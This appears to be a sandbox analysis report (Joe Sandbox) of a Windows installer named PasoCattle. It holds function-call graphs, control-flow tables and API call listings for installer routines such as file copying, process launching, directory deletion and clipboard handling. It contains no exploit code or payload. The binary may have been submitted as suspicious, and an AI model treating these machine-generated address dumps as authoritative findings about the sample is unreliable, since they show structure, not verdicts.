calls 3562->3573 3563->3564 3577 401765 ShowWindow 3564->3577 3564->3625 3578 401775 3565->3578 3579 401678 3566->3579 3580 40189d 3567->3580 3581 401968 GetFullPathNameW 3568->3581 3582 4017b8 3569->3582 3583 40169a 3570->3583 3571->3625 3584 4018e2 3572->3584 3585 4016c7 SetForegroundWindow 3573->3585 3586 40161c 3574->3586 3587 4019d1 SearchPathW 3575->3587 3576->3625 3577->3625 3591 4062cf 11 API calls 3578->3591 3592 4062cf 11 API calls 3579->3592 3670 406301 FindFirstFileW 3580->3670 3594 4019a1 3581->3594 3595 40197f 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 4062cf 11 API calls 3583->3597 3598 40145c 18 API calls 3584->3598 3585->3625 3599 4062cf 11 API calls 3586->3599 3587->3558 3587->3625 3588->3625 3600 401664 3589->3600 3601 401785 SetFileAttributesW 3591->3601 3602 401683 3592->3602 3614 4019b8 GetShortPathNameW 3594->3614 3594->3625 3595->3594 3620 406301 2 API calls 3595->3620 3604 4017c9 3596->3604 3605 4016a7 Sleep 3597->3605 3606 4018eb 3598->3606 3607 401627 3599->3607 3608 40139d 65 API calls 3600->3608 3609 40179a 3601->3609 3601->3625 3618 404f9e 25 API calls 3602->3618 3652 405d85 CharNextW CharNextW 3604->3652 3605->3625 3615 40145c 18 API calls 3606->3615 3616 404f9e 25 API calls 3607->3616 3608->3625 3617 4062cf 11 API calls 3609->3617 3610 4018c2 3621 4062cf 11 API calls 3610->3621 3611 4018a9 3619 4062cf 11 API calls 3611->3619 3614->3625 3623 4018f5 3615->3623 3616->3625 3617->3625 3618->3625 3619->3625 3624 401991 3620->3624 3621->3625 3622 4017d4 3626 401864 3622->3626 3629 405d32 CharNextW 3622->3629 3647 4062cf 11 API calls 3622->3647 3627 4062cf 11 API calls 3623->3627 3624->3594 3678 406035 lstrcpynW 3624->3678 3625->3523 3626->3602 3628 40186e 3626->3628 3630 401902 MoveFileW 3627->3630 3658 404f9e 3628->3658 3633 4017e6 CreateDirectoryW 3629->3633 3634 401912 3630->3634 3635 40191e 3630->3635 3633->3622 3637 4017fe GetLastError 3633->3637 3634->3602 3641 406301 2 API calls 3635->3641 3651 401942 3635->3651 3639 401827 GetFileAttributesW 3637->3639 3640 40180b GetLastError 3637->3640 3639->3622 3644 4062cf 11 API calls 3640->3644 3645 401929 3641->3645 3642 401882 SetCurrentDirectoryW 3642->3625 3643 4062cf 11 API calls 3646 40195c 3643->3646 3644->3622 3645->3651 3673 406c94 3645->3673 3646->3625 3647->3622 3650 404f9e 25 API calls 3650->3651 3651->3643 3653 405da2 3652->3653 3656 405db4 3652->3656 3655 405daf CharNextW 3653->3655 3653->3656 3654 405dd8 3654->3622 3655->3654 3656->3654 3657 405d32 CharNextW 3656->3657 3657->3656 3659 404fb7 3658->3659 3660 401875 3658->3660 3661 404fd5 lstrlenW 3659->3661 3662 406831 18 API calls 3659->3662 3669 406035 lstrcpynW 3660->3669 3663 404fe3 lstrlenW 3661->3663 3664 404ffe 3661->3664 3662->3661 3663->3660 3665 404ff5 lstrcatW 3663->3665 3666 405011 3664->3666 3667 405004 SetWindowTextW 3664->3667 3665->3664 3666->3660 3668 405017 SendMessageW SendMessageW SendMessageW 3666->3668 3667->3666 3668->3660 3669->3642 3671 4018a5 3670->3671 3672 406317 FindClose 3670->3672 3671->3610 3671->3611 3672->3671 3680 406328 GetModuleHandleA 3673->3680 3677 401936 3677->3650 3678->3594 3679->3625 3681 406340 LoadLibraryA 3680->3681 3682 40634b GetProcAddress 3680->3682 3681->3682 3683 406359 3681->3683 3682->3683 3683->3677 3684 406ac5 lstrcpyW 3683->3684 3685 406b13 GetShortPathNameW 3684->3685 3686 406aea 3684->3686 3687 406b2c 3685->3687 3688 406c8e 3685->3688 3710 405e7c GetFileAttributesW CreateFileW 3686->3710 3687->3688 3691 406b34 WideCharToMultiByte 3687->3691 3688->3677 3690 406af3 CloseHandle GetShortPathNameW 3690->3688 3692 406b0b 3690->3692 3691->3688 3693 406b51 WideCharToMultiByte 3691->3693 3692->3685 3692->3688 3693->3688 3694 406b69 wsprintfA 3693->3694 3695 406831 18 API calls 3694->3695 3696 406b95 3695->3696 3711 405e7c GetFileAttributesW CreateFileW 3696->3711 3698 406ba2 3698->3688 3699 406baf GetFileSize GlobalAlloc 3698->3699 3700 406bd0 ReadFile 3699->3700 3701 406c84 CloseHandle 3699->3701 3700->3701 3702 406bea 3700->3702 3701->3688 3702->3701 3712 405de2 lstrlenA 3702->3712 3705 406c03 lstrcpyA 3708 406c25 3705->3708 3706 406c17 3707 405de2 4 API calls 3706->3707 3707->3708 3709 406c5c SetFilePointer WriteFile GlobalFree 3708->3709 3709->3701 3710->3690 3711->3698 3713 405e23 lstrlenA 3712->3713 3714 405e2b 3713->3714 3715 405dfc lstrcmpiA 3713->3715 3714->3705 3714->3706 3715->3714 3716 405e1a CharNextA 3715->3716 3716->3713 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3891 4038af #17 SetErrorMode OleInitialize 3892 406328 3 API calls 3891->3892 3893 4038f2 SHGetFileInfoW 3892->3893 3965 406035 lstrcpynW 3893->3965 3895 40391d GetCommandLineW 3966 406035 lstrcpynW 3895->3966 3897 40392f GetModuleHandleW 3898 403947 3897->3898 3899 405d32 CharNextW 3898->3899 3900 403956 CharNextW 3899->3900 3911 403968 3900->3911 3901 403a02 3902 403a21 GetTempPathW 3901->3902 3967 4037f8 3902->3967 3904 403a37 3906 403a3b GetWindowsDirectoryW lstrcatW 3904->3906 3907 403a5f DeleteFileW 3904->3907 3905 405d32 CharNextW 3905->3911 3909 4037f8 11 API calls 3906->3909 3975 4035b3 GetTickCount GetModuleFileNameW 3907->3975 3912 403a57 3909->3912 3910 403a73 3913 403af8 3910->3913 3915 405d32 CharNextW 3910->3915 3951 403add 3910->3951 3911->3901 3911->3905 3918 403a04 3911->3918 3912->3907 3912->3913 4060 403885 3913->4060 3919 403a8a 3915->3919 4067 406035 lstrcpynW 3918->4067 3930 403b23 lstrcatW lstrcmpiW 3919->3930 3931 403ab5 3919->3931 3920 403aed 3923 406113 9 API calls 3920->3923 3921 403bfa 3924 403c7d 3921->3924 3926 406328 3 API calls 3921->3926 3922 403b0d 3925 405ccc MessageBoxIndirectW 3922->3925 3923->3913 3927 403b1b ExitProcess 3925->3927 3929 403c09 3926->3929 3933 406328 3 API calls 3929->3933 3930->3913 3932 403b3f CreateDirectoryW SetCurrentDirectoryW 3930->3932 4068 4067aa 3931->4068 3935 403b62 3932->3935 3936 403b57 3932->3936 3937 403c12 3933->3937 4085 406035 lstrcpynW 3935->4085 4084 406035 lstrcpynW 3936->4084 3941 406328 3 API calls 3937->3941 3944 403c1b 3941->3944 3943 403b70 4086 406035 lstrcpynW 3943->4086 3945 403c69 ExitWindowsEx 3944->3945 3950 403c29 GetCurrentProcess 3944->3950 3945->3924 3949 403c76 3945->3949 3946 403ad2 4083 406035 lstrcpynW 3946->4083 3952 40141d 80 API calls 3949->3952 3954 403c39 3950->3954 4003 405958 3951->4003 3952->3924 3953 406831 18 API calls 3955 403b98 DeleteFileW 3953->3955 3954->3945 3956 403ba5 CopyFileW 3955->3956 3962 403b7f 3955->3962 3956->3962 3957 403bee 3958 406c94 42 API calls 3957->3958 3960 403bf5 3958->3960 3959 406c94 42 API calls 3959->3962 3960->3913 3961 406831 18 API calls 3961->3962 3962->3953 3962->3957 3962->3959 3962->3961 3964 403bd9 CloseHandle 3962->3964 4087 405c6b CreateProcessW 3962->4087 3964->3962 3965->3895 3966->3897 3968 406064 5 API calls 3967->3968 3969 403804 3968->3969 3970 40380e 3969->3970 3971 40674e 3 API calls 3969->3971 3970->3904 3972 403816 CreateDirectoryW 3971->3972 3973 405eab 2 API calls 3972->3973 3974 40382a 3973->3974 3974->3904 4090 405e7c GetFileAttributesW CreateFileW 3975->4090 3977 4035f3 3997 403603 3977->3997 4091 406035 lstrcpynW 3977->4091 3979 403619 4092 40677d lstrlenW 3979->4092 3983 40362a GetFileSize 3984 403726 3983->3984 3998 403641 3983->3998 4097 4032d2 3984->4097 3986 40372f 3988 40376b GlobalAlloc 3986->3988 3986->3997 4109 403368 SetFilePointer 3986->4109 3987 403336 ReadFile 3987->3998 4108 403368 SetFilePointer 3988->4108 3991 4037e9 3994 4032d2 6 API calls 3991->3994 3992 403786 3995 40337f 33 API calls 3992->3995 3993 40374c 3996 403336 ReadFile 3993->3996 3994->3997 4001 403792 3995->4001 4000 403757 3996->4000 3997->3910 3998->3984 3998->3987 3998->3991 3998->3997 3999 4032d2 6 API calls 3998->3999 3999->3998 4000->3988 4000->3997 4001->3997 4001->4001 4002 4037c0 SetFilePointer 4001->4002 4002->3997 4004 406328 3 API calls 4003->4004 4005 40596c 4004->4005 4006 405972 4005->4006 4007 405984 4005->4007 4123 405f7d wsprintfW 4006->4123 4008 405eff 3 API calls 4007->4008 4009 4059b5 4008->4009 4011 4059d4 lstrcatW 4009->4011 4013 405eff 3 API calls 4009->4013 4012 405982 4011->4012 4114 403ec1 4012->4114 4013->4011 4016 4067aa 18 API calls 4017 405a06 4016->4017 4018 405a9c 4017->4018 4020 405eff 3 API calls 4017->4020 4019 4067aa 18 API calls 4018->4019 4021 405aa2 4019->4021 4022 405a38 4020->4022 4023 405ab2 4021->4023 4024 406831 18 API calls 4021->4024 4022->4018 4026 405a5b lstrlenW 4022->4026 4029 405d32 CharNextW 4022->4029 4025 405ad2 LoadImageW 4023->4025 4125 403ea0 4023->4125 4024->4023 4027 405b92 4025->4027 4028 405afd RegisterClassW 4025->4028 4030 405a69 lstrcmpiW 4026->4030 4031 405a8f 4026->4031 4035 40141d 80 API calls 4027->4035 4033 405b9c 4028->4033 4034 405b45 SystemParametersInfoW CreateWindowExW 4028->4034 4036 405a56 4029->4036 4030->4031 4037 405a79 GetFileAttributesW 4030->4037 4039 40674e 3 API calls 4031->4039 4033->3920 4034->4027 4040 405b98 4035->4040 4036->4026 4041 405a85 4037->4041 4038 405ac8 4038->4025 4042 405a95 4039->4042 4040->4033 4043 403ec1 19 API calls 4040->4043 4041->4031 4044 40677d 2 API calls 4041->4044 4124 406035 lstrcpynW 4042->4124 4046 405ba9 4043->4046 4044->4031 4047 405bb5 ShowWindow LoadLibraryW 4046->4047 4048 405c38 4046->4048 4049 405bd4 LoadLibraryW 4047->4049 4050 405bdb GetClassInfoW 4047->4050 4051 405073 83 API calls 4048->4051 4049->4050 4052 405c05 DialogBoxParamW 4050->4052 4053 405bef GetClassInfoW RegisterClassW 4050->4053 4054 405c3e 4051->4054 4057 40141d 80 API calls 4052->4057 4053->4052 4055 405c42 4054->4055 4056 405c5a 4054->4056 4055->4033 4059 40141d 80 API calls 4055->4059 4058 40141d 80 API calls 4056->4058 4057->4033 4058->4033 4059->4033 4061 40389d 4060->4061 4062 40388f CloseHandle 4060->4062 4132 403caf 4061->4132 4062->4061 4067->3902 4185 406035 lstrcpynW 4068->4185 4070 4067bb 4071 405d85 4 API calls 4070->4071 4072 4067c1 4071->4072 4073 406064 5 API calls 4072->4073 4080 403ac3 4072->4080 4076 4067d1 4073->4076 4074 406809 lstrlenW 4075 406810 4074->4075 4074->4076 4078 40674e 3 API calls 4075->4078 4076->4074 4077 406301 2 API calls 4076->4077 4076->4080 4081 40677d 2 API calls 4076->4081 4077->4076 4079 406816 GetFileAttributesW 4078->4079 4079->4080 4080->3913 4082 406035 lstrcpynW 4080->4082 4081->4074 4082->3946 4083->3951 4084->3935 4085->3943 4086->3962 4088 405ca6 4087->4088 4089 405c9a CloseHandle 4087->4089 4088->3962 4089->4088 4090->3977 4091->3979 4093 40678c 4092->4093 4094 406792 CharPrevW 4093->4094 4095 40361f 4093->4095 4094->4093 4094->4095 4096 406035 lstrcpynW 4095->4096 4096->3983 4098 4032f3 4097->4098 4099 4032db 4097->4099 4102 403303 GetTickCount 4098->4102 4103 4032fb 4098->4103 4100 4032e4 DestroyWindow 4099->4100 4101 4032eb 4099->4101 4100->4101 4101->3986 4105 403311 CreateDialogParamW ShowWindow 4102->4105 4106 403334 4102->4106 4110 40635e 4103->4110 4105->4106 4106->3986 4108->3992 4109->3993 4111 40637b PeekMessageW 4110->4111 4112 406371 DispatchMessageW 4111->4112 4113 403301 4111->4113 4112->4111 4113->3986 4115 403ed5 4114->4115 4130 405f7d wsprintfW 4115->4130 4117 403f49 4118 406831 18 API calls 4117->4118 4119 403f55 SetWindowTextW 4118->4119 4120 403f70 4119->4120 4121 403f8b 4120->4121 4122 406831 18 API calls 4120->4122 4121->4016 4122->4120 4123->4012 4124->4018 4131 406035 lstrcpynW 4125->4131 4127 403eb4 4128 40674e 3 API calls 4127->4128 4129 403eba lstrcatW 4128->4129 4129->4038 4130->4117 4131->4127 4133 403cbd 4132->4133 4134 4038a2 4133->4134 4135 403cc2 FreeLibrary GlobalFree 4133->4135 4136 406cc7 4134->4136 4135->4134 4135->4135 4137 4067aa 18 API calls 4136->4137 4138 406cda 4137->4138 4139 406ce3 DeleteFileW 4138->4139 4140 406cfa 4138->4140 4179 4038ae CoUninitialize 4139->4179 4141 406e77 4140->4141 4183 406035 lstrcpynW 4140->4183 4147 406301 2 API calls 4141->4147 4167 406e84 4141->4167 4141->4179 4143 406d25 4144 406d39 4143->4144 4145 406d2f lstrcatW 4143->4145 4148 40677d 2 API calls 4144->4148 4146 406d3f 4145->4146 4150 406d4f lstrcatW 4146->4150 4152 406d57 lstrlenW FindFirstFileW 4146->4152 4149 406e90 4147->4149 4148->4146 4153 40674e 3 API calls 4149->4153 4149->4179 4150->4152 4151 4062cf 11 API calls 4151->4179 4156 406e67 4152->4156 4180 406d7e 4152->4180 4154 406e9a 4153->4154 4157 4062cf 11 API calls 4154->4157 4155 405d32 CharNextW 4155->4180 4156->4141 4158 406ea5 4157->4158 4159 405e5c 2 API calls 4158->4159 4160 406ead RemoveDirectoryW 4159->4160 4164 406ef0 4160->4164 4165 406eb9 4160->4165 4161 406e44 FindNextFileW 4163 406e5c FindClose 4161->4163 4161->4180 4163->4156 4166 404f9e 25 API calls 4164->4166 4165->4167 4168 406ebf 4165->4168 4166->4179 4167->4151 4170 4062cf 11 API calls 4168->4170 4169 4062cf 11 API calls 4169->4180 4171 406ec9 4170->4171 4174 404f9e 25 API calls 4171->4174 4172 406cc7 72 API calls 4172->4180 4173 405e5c 2 API calls 4175 406dfa DeleteFileW 4173->4175 4176 406ed3 4174->4176 4175->4180 4177 406c94 42 API calls 4176->4177 4177->4179 4178 404f9e 25 API calls 4178->4161 4179->3921 4179->3922 4180->4155 4180->4161 4180->4169 4180->4172 4180->4173 4180->4178 4181 404f9e 25 API calls 4180->4181 4182 406c94 42 API calls 4180->4182 4184 406035 lstrcpynW 4180->4184 4181->4180 4182->4180 4183->4143 4184->4180 4185->4070 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3717 4021b5 3718 40145c 18 API calls 3717->3718 3719 4021bb 3718->3719 3720 40145c 18 API calls 3719->3720 3721 4021c4 3720->3721 3722 40145c 18 API calls 3721->3722 3723 4021cd 3722->3723 3724 40145c 18 API calls 3723->3724 3725 4021d6 3724->3725 3726 404f9e 25 API calls 3725->3726 3727 4021e2 ShellExecuteW 3726->3727 3728 40221b 3727->3728 3729 40220d 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 4062cf 11 API calls 3729->3731 3732 402230 3730->3732 3731->3728 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                            • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,771B23A0,00000000), ref: 00406902
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                          • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                          • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                          • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                          • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                          • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000007.00000002.1298047286.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000007.00000002.1298005090.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298176646.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298213223.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000007.00000002.1298504433.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_7_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                          • String ID: New install of "%s" to "%s"${
                                                                                                                                                                          • API String ID: 2110491804-1641061399
                                                                                                                                                                          • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                          • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                          • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                          • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                          • Executed
                                                                                                                                                                          • Not Executed
                                                                                                                                                                          control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 